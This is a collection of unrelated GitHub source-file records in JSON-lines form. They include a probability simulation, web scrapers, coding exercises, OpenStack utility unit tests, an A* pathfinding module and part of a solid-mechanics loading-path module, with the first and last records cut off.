coin_dice_experiment():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n dice = ['1', '2', '3', '4', '5', '6']\n coin = ['h', 't']\n\n coin_result = np.random.choice(coin)\n dice_result = np.random.choice(dice)\n\n if dice_result == '3' and coin_result == 't':\n return 1\n else:\n return 0\n\n\ndef gen_graph(exact_value, n_runs, prob, runs):\n \"\"\"constrói o gráfico das simulações\n\n Args:\n exact_value (float): [description]\n n_runs (int)): [description]\n prob (list): [description]\n runs (list): [description]\n \"\"\"\n plt.hlines(exact_value, 0, n_runs, colors='brown', label='valor exato = 1/12')\n plt.plot(runs, prob, label='Lançamento de uma moeda e de um dado de 6 lados')\n plt.xlabel('# de lançamentos')\n plt.ylabel('Probabilidade de sair {hh} E {3}')\n plt.legend()\n plt.show()\n\n\ndef main():\n n_runs = 100000\n count = 0\n exact_value = 1/12\n\n prob = []\n runs = []\n\n for run in range(n_runs):\n count += coin_dice_experiment()\n prob.append(count/(run+1))\n runs.append(run+1)\n\n gen_graph(exact_value, n_runs, prob, runs) \n\nif __name__ == '__main__':\n main()","repo_name":"jrsmoura/topicos-avancados","sub_path":"aula-01/coin_flip.py","file_name":"coin_flip.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35841212208","text":"import itertools\n\nfrom bs4 import BeautifulSoup\n\nfrom ..db.models import ContactType\nfrom .parserBase import Parser\n\n\nclass OptunionParser(Parser):\n def __init__(self):\n super().__init__()\n\n self.SITE_ROOT = \"https://www.opt-union.ru\"\n\n\n def parse_listing(self, url):\n companies = set()\n\n for page in itertools.count(start=1):\n previous_len = len(companies)\n\n resp = self.sess.get(url, params={\"page\": page})\n with open(\"result.html\", \"w\", encoding=\"utf8\") as file:\n file.write(resp.text)\n\n soup = BeautifulSoup(resp.text, \"lxml\")\n\n divs = soup.find_all(\"div\", attrs={\"class\": \"data-block bordered\"})\n\n try:\n companies.update([div.find_all(\"a\")[0].get(\"href\") for div in divs[1:]])\n\n # Page change layout\n except AttributeError:\n print(\"Change layout\")\n break\n\n if previous_len == len(companies):\n break\n\n return list(map(lambda company: self.SITE_ROOT + company, companies))\n\n\n def parse_vendor(self, url):\n resp = self.sess.get(url)\n\n soup = BeautifulSoup(resp.text, \"lxml\")\n\n try:\n # Getting name and drop extra substrings\n name = soup.find(\"h1\").text.removesuffix(\" - о компании\").removesuffix(\" - список товаров\")\n\n # Getting company's description\n description = soup.find(\"div\", attrs={\"class\": \"data-block\"}).text.strip()\n\n # Trying to get multiply phone numbers\n country = self.__find_by_property_name(soup, \"Страна\")\n city = self.__find_by_property_name(soup, \"Город\")\n address = self.__find_by_property_name(soup, \"Адрес\")\n\n contacts = {}\n phones = self.__find_by_property_name(soup, \"Телефон\")\n if phones: \n contacts[ContactType.PHONE] = phones.split(\",\")\n website = self.__find_by_property_name(soup, \"Интернет\")\n if website: \n contacts[ContactType.WEBSITE] = [website]\n\n return {\n \"url\": url,\n \"name\": name,\n \"description\": description,\n \"country\": country,\n \"city\": city,\n \"address\": address,\n \"contacts\": contacts,\n }\n except AttributeError as e:\n return None\n\n\n def parse_vendors(self, url):\n vendor_urls = self.parse_listing(url)\n vendors = list(map(self.parse_vendor, vendor_urls))\n\n return vendors\n\n\n @staticmethod\n def __find_by_property_name(soup, property_name):\n property_tag = soup.find(\"div\", attrs={\"class\": \"itemLeft\"}, string=property_name)\n if property_tag:\n value = property_tag.findNext(\"div\", attrs={\"class\": \"itemRight\"}).text\n\n return value\n else:\n return None","repo_name":"ArtemiyMalau/leadersofdigital2021","sub_path":"py/parsers/optunionParser.py","file_name":"optunionParser.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26258232373","text":"class Wallet:\n def stacked(self,value):\n notes = []\n for e in range(0,10):\n notes.append(value)\n return notes\n \n def __init__(self):\n self.price = 0\n self.coins = 0\n self.fives = self.stacked(5)\n self.tens = self.stacked(10)\n self.twenties = self.stacked(20)\n self.fifties = self.stacked(50)\n self.hundreds = self.stacked(100)\n \n def pay(self):\n price = int(input(\"Price $\"))\n self.price = price\n while price >= 5:\n if price >= 100: \n self.hundreds.pop()\n price -= 100\n elif price >= 50:\n self.fifties.pop()\n price -= 50\n elif price >= 20:\n self.twenties.pop()\n price -= 20\n elif price >= 10:\n self.tens.pop()\n price -= 10\n else:\n price -= 5\n self.fives.pop()\n self.coins = price\n \n def used(self,*args):\n return 10 - len(*args) \n \n def notes(self,*args):\n return f'- uses {self.used(*args)}' if self.used(*args) >= 0 else ''\n \n def show(self):\n self.pay()\n print(f'Wallet:\\n{self.notes(self.hundreds)} notes of 100\\n{self.notes(self.fifties)} notes of 50\\n{self.notes(self.twenties)} notes of 20\\n{self.notes(self.tens)} notes of 10\\n{self.notes(self.fives)} notes of 5\\n- used {self.coins} coins\\n')\n \ndef main():\n Wallet().show()\n \nif __name__ == '__main__':\n main()\n \n \n \n \n ","repo_name":"Georges034302/fsd_python","sub_path":"labs/lab07/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71217222953","text":"\"\"\"\r\n\"abacabad\" c\r\n\"abacabaabacaba\" _\r\n\"abcdefghijklmnopqrstuvwxyziflskecznslkjfabe\" d\r\n\"bcccccccccccccyb\" y\r\n\"\"\"\r\n\r\ndef first_not_repeating_char(char_sequence):\r\n\r\n for idx, char in enumerate(char_sequence):\r\n duplicate = False\r\n\r\n for c in (char_sequence[idx + 1: len(char_sequence)]):\r\n if char == c:\r\n duplicate = True\r\n break\r\n\r\n for c in (char_sequence[0: idx - 1]):\r\n if char == c:\r\n duplicate = True\r\n break\r\n\r\n if duplicate == False:\r\n return char\r\n\r\n return '_'\r\n\r\n\r\nif __name__ == '__main__':\r\n char_sequence = str(raw_input('Escribe una secuencia de caracteres: '))\r\n\r\n result = first_not_repeating_char(char_sequence)\r\n\r\n if result == '_':\r\n print('Todos los caracteres se repiten.')\r\n else:\r\n print('El primer caracter no repetido es: {}'.format(result))\r\n","repo_name":"AdrianOrtiga/Python","sub_path":"repetidos.py","file_name":"repetidos.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13615767687","text":"from django.core.cache import cache\nimport mock\nimport unittest\n\nfrom newton_base import util\nfrom newton_base.tests import mock_info\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_get_query(self):\n query_string = \"name=ferret&color=purple\"\n mock_request = mock.Mock()\n mock_request.get_full_path.side_effect = [\n \"path/to/page?\" + query_string,\n \"path/to/page\"\n ]\n\n self.assertEqual(\n query_string, util.VimDriverUtils.get_query_part(\n mock_request))\n self.assertEqual(\n \"\", util.VimDriverUtils.get_query_part( mock_request))\n\n def test_get_new_openstack_v2_session_with_tenant_id(self):\n vim_info = mock_info.MOCK_VIM_INFO.copy()\n vim_info[\"url\"] = \"http://128.224.180.14:5000/v2\"\n tenant_it = \"1a62b3971d774404a504c5d9a3e506e3\"\n\n os_session = util.VimDriverUtils.get_session(\n vim_info, tenant_it)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(vim_info[\"url\"], os_session.auth.auth_url)\n self.assertEqual(vim_info[\"userName\"],\n os_session.auth.username)\n self.assertEqual(vim_info[\"password\"],\n os_session.auth.password)\n\n def test_get_new_openstack_v3_session_with_project_id(self):\n projectid = \"1a62b3971d774404a504c5d9a3e506e3\"\n os_session = util.VimDriverUtils.get_session(\n mock_info.MOCK_VIM_INFO, projectid)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(mock_info.MOCK_VIM_INFO[\"url\"],\n os_session.auth.auth_url)\n self.assertEqual(mock_info.MOCK_VIM_INFO[\"domain\"],\n os_session.auth.project_domain_name)\n self.assertEqual(projectid,\n os_session.auth.project_id)\n\n def test_get_new_openstack_session_with_project_id(self):\n vim_info = mock_info.MOCK_VIM_INFO.copy()\n vim_info[\"url\"] = \"http://128.224.180.14:5000\"\n project_id = \"1a62b3971d774404a504c5d9a3e506e3\"\n\n os_session = util.VimDriverUtils.get_session(\n vim_info, project_id)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(vim_info[\"url\"] + \"/v3\",\n os_session.auth.auth_url[0])\n\n def test_get_new_openstack_v3_session_with_project_name(self):\n project_name = \"demo\"\n os_session = util.VimDriverUtils.get_session(\n mock_info.MOCK_VIM_INFO, tenant_name=project_name)\n\n self.assertIsNotNone(os_session)\n self.assertIsNotNone(os_session.auth)\n self.assertEqual(project_name,\n os_session.auth.project_name)\n\n def test_get_auth_state_from_valid_session(self):\n test_result = \"auth_state\"\n\n mock_auth = mock.Mock()\n mock_auth.get_auth_state.return_value = test_result\n mock_session = mock.Mock()\n mock_session._auth_required.return_value = mock_auth\n\n auth_state = util.VimDriverUtils.get_auth_state(mock_session)\n\n self.assertIsNotNone(auth_state)\n self.assertEqual(test_result, auth_state)\n\n def test_get_auth_state_from_invalid_session(self):\n mock_session = mock.Mock()\n mock_session._auth_required.return_value = None\n\n self.assertIsNone(util.VimDriverUtils.get_auth_state(\n mock_session))\n\n @mock.patch.object(cache, 'get')\n def test_get_valid_tokens_from_cache(self, mock_cache_get):\n mock_cache_get.return_value = \"valid_token\"\n\n token, meta_token = util.VimDriverUtils.get_token_cache(\n \"token\")\n self.assertIsNotNone(token)\n self.assertIsNotNone(meta_token)\n\n @mock.patch.object(cache, 'get')\n def test_update_cache_expired_info(self, mock_cache_get):\n mock_cache_get.return_value = None\n\n util.VimDriverUtils.update_token_cache(\n \"token\", \"auth_state\", \"metadata\")\n\n @mock.patch.object(cache, 'get')\n def test_update_cache_info(self, mock_cache_get):\n mock_cache_get.return_value = \"existing\"\n\n util.VimDriverUtils.update_token_cache(\n \"token\", \"auth_state\", \"metadata\")\n\n def test_replace_keys_of_dict(self):\n dict_obj = {\n \"project_id\": \"demo\",\n \"ram\": \"16G\"\n }\n new_keys = [\"tenantId\", \"memory\"]\n mapping = [(o, n) for o, n in zip(list(dict_obj.keys()), new_keys)]\n util.VimDriverUtils.replace_key_by_mapping(\n dict_obj, mapping)\n\n self.assertEqual(len(new_keys), len(list(dict_obj.keys())))\n self.assertEqual(sorted(new_keys), sorted(list(dict_obj.keys())))\n\n def test_replace_keys_reverse_order(self):\n dict_obj = {\n \"project_id\": \"demo\",\n \"ram\": \"16G\"\n }\n new_keys = [\"tenantId\", \"memory\"]\n mapping = [(n, o) for o, n in zip(list(dict_obj.keys()), new_keys)]\n util.VimDriverUtils.replace_key_by_mapping(\n dict_obj, mapping, reverse=True)\n\n self.assertEqual(len(new_keys), len(list(dict_obj.keys())))\n self.assertEqual(sorted(new_keys), sorted(list(dict_obj.keys())))\n","repo_name":"onap/multicloud-openstack","sub_path":"newton/newton/requests/tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"37392053699","text":"L,R=map(int,input(),split())\n\ncount=0\n\nfor x in range(L,R+1):\n\n S = str(x)\n flag = True\n N = len(S)\n for i in range(N):\n if S[i] != S[(N-1)-i]:\n flag = False\n if flag:\n count += 1\n\nprint(count)","repo_name":"tetutetu214/lesson_python","sub_path":"0930.py","file_name":"0930.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37387461956","text":"import gridworld\nfrom ai import *\nfrom math import *\nfrom queue import PriorityQueue\n\n#-------------A* pathfinding algorithms--------------\n# NOTE: All A* are based off of sequential-heuristic.\n# We use h = inf as a dummy heuristic to make\n# the supplemental heuristics useless\n\n# Default A*\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\ndef default(map, start, goal):\n return weighted(map, start, goal, 1)\n\n# Weighted\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\n# h: Heuristic function, default h_pythagorean\n# w: Weight, default 1.0\ndef weighted(map, start, goal, w=1, h = h_pythagorean):\n return sequential(map, start, goal, w, 1, [h, lambda **kwa: inf])\n\n# Uniform-cost\n# map: Gridworld terrain map\n# start: Tuple representing start coordinates in (x, y)\n# goal: Tuple representing goal coordinates in (x, y)\ndef uniform(map, start, goal):\n return weighted(map, start, goal, 0, h_uniform_first) \n\n# Sequential-Heuristic\n# map: Gridworld terrain map\n# start: Tuple representing start coordinate in (x, y)\n# goal: Tuple representing goal coordinate in (x, y)\n# w: Overall weight, default 1.25\n# w2: Inadmissable-favored weight, default 2\n# list_h: List of heuristic functions to iterate over, list_h[0] is the anchor heuristic\ndef sequential(map, start, goal, w = 1.25, w2 = 2, list_h = all_heuristics):\n rows = len(map)\n cols = len(map[0])\n n_h = len(list_h)\n expansions = 0\n fringes = [PriorityQueue() for i in range(5)]\n closed = []\n \n parent_set = {k: {i: {j: None for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n f_set = {k: {i: {j: inf for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n g_set = {k: {i: {j: inf for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n h_set = {k: {i: {j: list_h[k](start = start, goal = goal, v = (j, i)) for j in range(cols)} for i in range(rows)} for k in range(n_h)}\n\n for i in range(n_h):\n f_set[i][start[1]][start[0]] = 0 + w * h_set[i][start[1]][start[0]]\n g_set[i][start[1]][start[0]] = 0\n fringes[i].put((f_set[i][start[1]][start[0]], start))\n\n while fringes[0].queue[0][0] < inf:\n for k in range(1, n_h):\n minkey = fringes[0].queue[0][0]\n minkey2 = fringes[k].queue[0][0]\n\n # 0th key or ith key has the current smallest fscore \n min_i = k if minkey2 <= w2 * minkey else 0\n\n fringe = fringes[min_i]\n parent = parent_set[min_i]\n f = f_set[min_i]\n g = g_set[min_i]\n h = h_set[min_i]\n\n pop = fringe.get() \n s = pop[1]\n\n if g[goal[1]][goal[0]] <= pop[0] and g[goal[1]][goal[0]] < inf: # End goal \n s = goal \n ret = {'f': f, 'g': g, \"h\": h, 'map': [s]}\n print(\"Expansions: \", expansions)\n\n while parent[s[1]][s[0]] != None:\n s = parent[s[1]][s[0]]\n ret['map'].insert(0, s)\n \n return ret\n\n for i in range(max(0, s[1] - 1), min(rows, s[1] + 2)):\n for j in range(max(0, s[0] - 1), min(cols, s[0] + 2)):\n s_p = (j, i)\n\n if s_p == s:\n continue\n\n g_temp = g[s[1]][s[0]] + cost(map, s, s_p)\n\n if s_p not in closed and g_temp < g[i][j]:\n parent[i][j] = s\n g[i][j] = g_temp\n f[i][j] = g[i][j] + w * h[i][j]\n expansions += 1\n in_fringe = False\n with fringe.mutex:\n in_fringe = s_p in fringe.queue\n\n if not in_fringe:\n fringe.put((f[i][j], s_p))\n\n print(\"failed\")\n return None\n","repo_name":"Endoman123/informed-search","sub_path":"a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71826347752","text":"\"\"\"\nLearn about Python return semantics and how Python functions handles arguments\n\"\"\"\n\ndef egg(var):\n \"\"\"\n returns the variable back to the user\n :param var: input object\n :return: input object\n \"\"\"\n return var\n\n# Required parameters must come first\n# Optional parameters after required parameters\ndef banner(message, border_character='*'):\n \"\"\"\n Print message in banner form\n :param message: String to print\n :param border: border character for string\n :return:\n \"\"\"\n #length = __len__(message)\n length = message.__len__() +4\n length = len(message) +4\n print_border = border_character*length\n print(print_border)\n print(border_character + \" \" + message + \" \" + border_character )\n print(print_border)\n\ndef add_spam(menu = None):\n \"\"\"\n Add spam to the menu list\n :param menu:\n :return: menu list\n \"\"\"\n if menu is None:\n menu = []\n\n menu.append('spam')\n return menu\n\n\ndef sum_two(num1, num2=8):\n \"\"\"\n Sum two input objects\n :param num1: object 1\n :param num2: object 2 (optional), default = 8\n :return: sum of objects\n \"\"\"\n return num1+num2\n\n\ndef test():\n \"\"\"\n Test function\n :return:\n \"\"\"\n c = [6, 10, 20]\n e = egg(c)\n print(c is e)\n n1=3\n n2=9\n print(n1 , \" + \" , n2, \" = \", sum_two(n1, n2))\n print(sum_two(\"Happy \", \"New Year\"))\n print(sum_two(n1))\n banner(\"Weber State University\")\n banner(\"Weber State University\",\"$\")\n\n breakfast = ['eggs', 'bacon']\n print(\"Before\", breakfast)\n add_spam(breakfast)\n print(\"After\", breakfast)\n\nprint(__name__)\n\nif __name__ == '__main__':\n test()\n exit(0)\n\n","repo_name":"pjbeeli/BeginPythonSum2019","sub_path":"return_semantics.py","file_name":"return_semantics.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20433419446","text":"import os\nimport csv\n\ndef main():\n\n with open('results.txt', 'r') as rcsv:\n content = csv.reader(rcsv)\n\n for row in content:\n new_row = row[1].split(\",\")\n\n renew = new_row[0].split(']')\n row = renew[0]\n\n with open('AgeDomain.csv', 'a') as wcsv:\n csv_write = csv.writer(wcsv)\n csv_write.writerow(str(row))\n \n\n \n\n\n \n\n\nif __name__ == '__main__':\n main()","repo_name":"jimwangzx/Phishing-Detection-2","sub_path":"Scripts/nomefile.py","file_name":"nomefile.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70026179753","text":"#!/usr/bin/env python\n\"\"\"\nStart module of simple REST messages service\n\"\"\"\n\n__version__ = \"0.0.1\"\n__author__ = \"@pejot\"\n\nimport logging\nimport tornado\nimport tornado.web\nfrom tornado.options import options, parse_config_file, define\nfrom handlers.home import HomeHandler\n\n\nclass Server:\n\n @classmethod\n def get_app(self):\n return tornado.web.Application(\n [\n (r\"/\", HomeHandler),\n ],\n )\n\n\ndef main():\n define(\"port\", default=8888, type=int)\n define(\"db\", default=\":memory:\")\n define(\"db_echo\", default=True)\n parse_config_file(\"application.cfg\")\n logging.info(\"Starting tornado server\")\n Server.get_app().listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"speedingdeer/real_time_massages_service","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73701485672","text":"import pandas as pd\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n#Boilerplate BeautifulSoup stuff and url\npage = requests.get('https://en.wikipedia.org/wiki/List_of_American_artists_1900_and_after')\nsoup = BeautifulSoup(page.text, 'html.parser')\n\n#Searching for target html div\ntarget_class = soup.find(class_='mw-parser-output')\ntarget_div = target_class.find_all('ul')\n\ncsv_list = []\n\nfor info in target_div[2:]:\n\tfor individual_artist in info.find_all('li'):\n\t\tlist_ = individual_artist.text.split(' ')\n\t\tcsv_list.append(list_)\n\nmodified_list = []\n\nfor entry in csv_list:\n\tentry[:] = [' '.join(entry[:])]\n\tfor chars in entry:\n\t\tmodified_entry = chars.replace('(', ' ').replace('-', ' ').replace('\\u2013', ' ').replace(')', '').replace(' born ', ' ').replace('c.', ' ').replace(' and ', ' ').replace(',', '').replace(' ', ' ')\n\t\tn = modified_entry.split(' ')\n\t\tmodified_list.append(n)\t\n\n#Prints neatly to console\nfor index in modified_list:\n\tprint(index)\n\n#Writes data to output file\nwith open(\"output.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(modified_list)\n","repo_name":"nznyn/scrangler","sub_path":"scrange_wip.py","file_name":"scrange_wip.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6571787491","text":"from moola.core import _monthly_spend\nfrom moola.models import Money, Transaction\n\n\ndef test_calc_monthly_spend_just_balances():\n start_balance = Money(2500)\n end_balance = Money(500)\n\n assert _monthly_spend(start_balance, end_balance) == Money(2000)\n\n\ndef test_calc_monthly_spend_decimal_balances():\n start_balance = Money(2500.99)\n end_balance = Money(500.99)\n\n monthly_spend = _monthly_spend(start_balance, end_balance)\n\n # Rounded amounts needed for decimals to match exactly\n assert monthly_spend.rounded_amount == Money(2000).rounded_amount\n\n\ndef test_calc_monthly_spend_with_transaction():\n start_balance = Money(2500)\n end_balance = Money(500)\n transactions = [Transaction(2, -50, \"Broadband\")]\n\n monthly_spend = _monthly_spend(start_balance, end_balance, transactions)\n\n assert monthly_spend == Money(1950)\n\n\ndef test_calc_monthly_spend_with_decimal_transactions():\n start_balance = Money(2500)\n end_balance = Money(500)\n transactions = [Transaction(2, -9.99, \"Nexflix\"), Transaction(2, -5.00, \"Spotify\")]\n\n monthly_spend = _monthly_spend(start_balance, end_balance, transactions)\n\n # Rounded amounts needed for decimals to match exactly\n assert monthly_spend.rounded_amount == Money(1985.01).rounded_amount\n","repo_name":"pxg/moola","sub_path":"tests/core/test_montly_spend.py","file_name":"test_montly_spend.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45027053884","text":"\"\"\"Loading path enforcement and incrementation.\n\nThis module includes several classes that control the general loading\nincrementation flow, namely two classes that allow the enforcement of a\ngeneral non-mononotic loading path (composed of mononotic loading subpaths)\nand two classes that allow rewinding the solution to a past loading increment.\n\nClasses\n-------\nLoadingPath\n Loading incrementation flow.\nLoadingSubpath\n Loading subpath.\nIncrementRewinder\n Rewind analysis to rewind state increment (initial instant).\nRewindManager\n Manage analysis rewind operations and evaluate analysis rewind criteria.\n\"\"\"\n#\n# Modules\n# =============================================================================\n# Standard\nimport copy\nimport time\n# Third-party\nimport numpy as np\nimport anytree.walker\n# Local\nimport ioput.info as info\nimport ioput.ioutilities as ioutil\nimport tensor.matrixoperations as mop\n#\n# Authorship & Credits\n# =============================================================================\n__author__ = 'Bernardo Ferreira (bernardo_ferreira@brown.edu)'\n__credits__ = ['Bernardo Ferreira', ]\n__status__ = 'Stable'\n# =============================================================================\n#\n# =============================================================================\n#\n# Loading path and subpath\n# =============================================================================\nclass LoadingPath:\n \"\"\"Loading incrementation flow.\n\n This class contains a collection of loading subpaths, the current loading\n state and a set of methods to control the loading incrementation flow.\n\n Attributes\n ----------\n _n_dim : int\n Problem number of spatial dimensions.\n _comp_order_sym : list[str]\n Strain/Stress components symmetric order.\n _comp_order_nsym : list[str]\n Strain/Stress components nonsymmetric order.\n _n_load_subpaths : int\n Number of loading subpaths.\n _load_subpaths : list\n List of LoadingSubpath.\n _conv_hom_state : dict\n Converged homogenized state (item, numpy.ndarray of shape (n_comps,))\n for key in {'strain', 'stress'}.\n _is_last_inc : bool\n Loading last increment flag.\n _n_cinc_cuts : int\n Consecutive loading increment cuts counter.\n _increm_state : dict\n Increment state: key `inc` contains the current increment number (int),\n key `subpath_id` contains the current loading subpath index (int).\n\n Methods\n -------\n new_load_increment(self)\n Setup new loading increment and get associated data.\n increment_cut(self, n_dim, comp_order)\n Perform loading increment cut and setup new increment.\n update_hom_state(self, hom_strain_mf, hom_stress_mf)\n Update converged homogenized state.\n get_subpath_state(self)\n Get current loading subpath state.\n get_increm_state(self)\n Get incremental state.\n _new_subpath(self)\n Add a new loading subpath to the loading path.\n _get_load_subpath(self)\n Get current loading subpath.\n _update_inc(self)\n Update loading increment counters.\n _get_applied_mac_load(self)\n Compute current applied loading.\n _get_inc_mac_load(self)\n Compute current incremental loading.\n _remove_sym(self, comp_order_sym, comp_order_nsym)\n Remove the symmetric components of loading related objects.\n _get_load_mf(n_dim, comp_order, load_vector)\n Get matricial form of load tensor given in vector form.\n \"\"\"\n def __init__(self, strain_formulation, problem_type, mac_load,\n mac_load_presctype, mac_load_increm, max_subinc_level=5,\n max_cinc_cuts=5):\n \"\"\"Constructor.\n\n Parameters\n ----------\n strain_formulation: {'infinitesimal', 'finite'}\n Problem strain formulation.\n problem_type : int\n Problem type: 2D plane strain (1), 2D plane stress (2),\n 2D axisymmetric (3) and 3D (4).\n mac_load : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the loading constraints for each loading subpath in a\n numpy.ndarray (2d), where the i-th row is associated with the i-th\n strain/stress component and the j-th column is associated with the\n j-th loading subpath.\n mac_load_presctype : numpy.ndarray (2d)\n Loading nature type ({'strain', 'stress'}) associated with each\n loading constraint (numpy.ndarrayndarray of shape\n (n_comps, n_load_subpaths)), where the i-th row is associated with\n the i-th strain/stress component and the j-th column is associated\n with the j-th loading subpath.\n mac_load_increm : dict\n For each loading subpath id (key, str), stores a numpy.ndarray of\n shape (n_load_increments, 2) where each row is associated with a\n prescribed loading increment, and the columns 0 and 1 contain the\n corresponding incremental load factor and incremental time,\n respectively.\n max_subinc_level : int, default=5\n Maximum level of loading subincrementation.\n max_cinc_cuts : int, default=5\n Maximum number of consecutive load increment cuts.\n \"\"\"\n self._strain_formulation = strain_formulation\n self._problem_type = problem_type\n self._mac_load = mac_load\n self._mac_load_presctype = mac_load_presctype\n self._mac_load_increm = mac_load_increm\n self._max_subinc_level = max_subinc_level\n self._max_cinc_cuts = max_cinc_cuts\n # Get problem type parameters\n n_dim, comp_order_sym, comp_order_nsym = \\\n mop.get_problem_type_parameters(problem_type)\n self._n_dim = n_dim\n self._comp_order_sym = comp_order_sym\n self._comp_order_nsym = comp_order_nsym\n # Remove symmetric components under an infinitesimal strain formulation\n if strain_formulation == 'infinitesimal':\n self._remove_sym(comp_order_sym, comp_order_nsym)\n # Set total number of loading subpaths\n self._n_load_subpaths = len(mac_load_increm.keys())\n # Initialize list of loading subpaths\n self._load_subpaths = []\n # Initialize increment state\n self._increm_state = {'inc': 0, 'subpath_id': -1}\n # Initialize converged homogenized state\n self._conv_hom_state = {key: None for key in ['strain', 'stress']}\n # Initialize loading last increment flag\n self._is_last_inc = False\n # Initialize consecutive increment cuts counter\n self._n_cinc_cuts = 0\n # -------------------------------------------------------------------------\n def new_load_increment(self):\n \"\"\"Setup new loading increment and get associated data.\n\n Returns\n -------\n applied_mac_load_mf : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n inc_mac_load_mf : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint matricial form in a\n numpy.ndarray of shape (n_comps,).\n n_presc_strain : int\n Number of prescribed loading strain components.\n presc_strain_idxs : list[int]\n Prescribed loading strain components indexes.\n n_presc_stress : int\n Number of prescribed loading stress components.\n presc_stress_idxs : list[int]\n Prescribed loading stress components indexes.\n is_last_inc : bool\n Loading last increment flag.\n \"\"\"\n # Set strain/stress components order according to problem strain\n # formulation\n if self._strain_formulation == 'infinitesimal':\n comp_order = self._comp_order_sym\n elif self._strain_formulation == 'finite':\n comp_order = self._comp_order_nsym\n else:\n raise RuntimeError('Unknown problem strain formulation.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Reset consecutive loading increment cuts counter\n self._n_cinc_cuts = 0\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Add a new loading subpath to the loading path if either first load\n # increment or current loading subpath is completed\n if self._increm_state['inc'] == 0 \\\n or self._get_load_subpath()._is_last_subpath_inc:\n # Add a new loading subpath\n self._new_subpath()\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update loading increment\n self._update_inc()\n # Check if last loading increment\n if load_subpath._id == self._n_load_subpaths - 1 and \\\n load_subpath._is_last_subpath_inc:\n self._is_last_inc = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current applied loading\n applied_mac_load = self._get_applied_mac_load()\n applied_mac_load_mf = {}\n for ltype in applied_mac_load.keys():\n applied_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, applied_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current incremental loading\n inc_mac_load = self._get_inc_mac_load()\n inc_mac_load_mf = {}\n for ltype in inc_mac_load.keys():\n inc_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, inc_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return applied_mac_load_mf, inc_mac_load_mf, \\\n load_subpath._n_presc_strain, load_subpath._presc_strain_idxs, \\\n load_subpath._n_presc_stress, load_subpath._presc_stress_idxs, \\\n self._is_last_inc\n # -------------------------------------------------------------------------\n def increment_cut(self, n_dim, comp_order):\n \"\"\"Perform loading increment cut and setup new increment.\n\n Parameters\n ----------\n n_dim : int\n Problem dimension.\n comp_order : list[str]\n Strain/Stress components (str) order.\n\n Returns\n -------\n applied_mac_load_mf : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n 